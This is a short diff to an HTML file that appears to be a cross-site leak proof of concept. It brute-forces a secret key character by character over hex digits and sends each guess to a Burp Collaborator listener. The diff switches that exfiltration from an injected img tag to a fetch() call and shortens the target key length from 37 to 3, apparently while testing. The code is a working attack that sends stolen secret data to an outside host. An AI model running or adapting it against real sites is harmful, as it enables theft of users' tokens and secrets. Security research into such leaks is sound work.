--- a/csl2.html
+++ b/csl2.html
@@ -14,15 +14,17 @@
     {
         console.log("sendKey:"+k)
         
-        var ul= document.getElementById("secrets");
-        var li = document.createElement("img");
-        li.src = "http://s81a9uym9ibodhw899ouoeei89e02p.burpcollaborator.net?key="+k
-        ul.appendChild(li);
+    //    var ul= document.getElementById("secrets");
+    //    var li = document.createElement("img");
+    //    li.src = "http://s81a9uym9ibodhw899ouoeei89e02p.burpcollaborator.net?key="+k
+    //    ul.appendChild(li);
+
+        fetch("http://s81a9uym9ibodhw899ouoeei89e02p.burpcollaborator.net?key="+k)
     };
     sendKey("Started")
 
     key = ""
-    while (key.length < 37) {
+    while (key.length < 3) {
         chars="0123456789-abcdef"
         for (var i = 0; i < chars.length; i++) {
             char = chars.charAt(i)
